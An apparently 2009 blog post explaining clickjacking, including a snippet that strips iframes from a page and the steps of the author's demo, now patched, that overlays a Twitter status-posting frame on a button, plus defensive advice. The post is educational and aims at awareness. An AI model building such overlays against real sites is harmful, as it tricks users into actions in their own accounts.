‘Clickjacking’, if you haven’t heard of it, is a method used by malicious individuals to trick users like you into clicking something without you knowing what you’ve clicked. It’s also known as UI-redressing and only works in browsers that support frames/CSS.
I believe the original concern was related to Flash and how a user could unknowingly enable their webcam and microphone so the attacker would have access. There are some other examples shown here: http://www.grc.com/sn/notes-168.htm.
Adobe resolved this issue in October of last year with a new release of Flash Player. Obviously this only offers protection for that particular exploit – gaining access to webcam/microphone; other more rudimentary techniques still work perfectly today.
And here’s a script you could use:
var all = document.getElementsByTagName('iframe'), l = all.length; while (l--) all[l].parentNode.removeChild(all[l]);
THIS NO LONGER WORKS (as of ~6:45 PM, 12/Feb’09), TWITTER HAS IMPLEMENTED A FRAME-BREAKING SCRIPT » This is a good thing!
Using the basic technique of positioning an iframe over a button coupled with Twitter’s ‘status’ URL parameter I have created a small demo which shows you just how serious (and annoying) this could be!
It will only work if you’re currently logged into Twitter (and if you haven’t got any of the above measures in place):
- Go to Twitter, make sure you’re logged in.
- Go to this page: qd9.co.uk/temp/ClickJackEg.html
- Click the button.
- Wait about two seconds
- Go to your Twitter page; look at your latest status!
What does this mean? It means anyone can update your Twitter status without you knowing! Actually, it’s YOU that’s updating it, you just don’t know at the time.
This is a pretty harmless example but I can imagine it being used for more sinister endeavours!
Clickjacking is a dangerous malicious technique; take it seriously! It cannot be halted with a quick browser fix here and there because the problem lies within the CSS/frame implementation itself; it’s not a software bug! If you’re fortunate enough to use Firefox then install NoScript, otherwise explore the other measures I described above.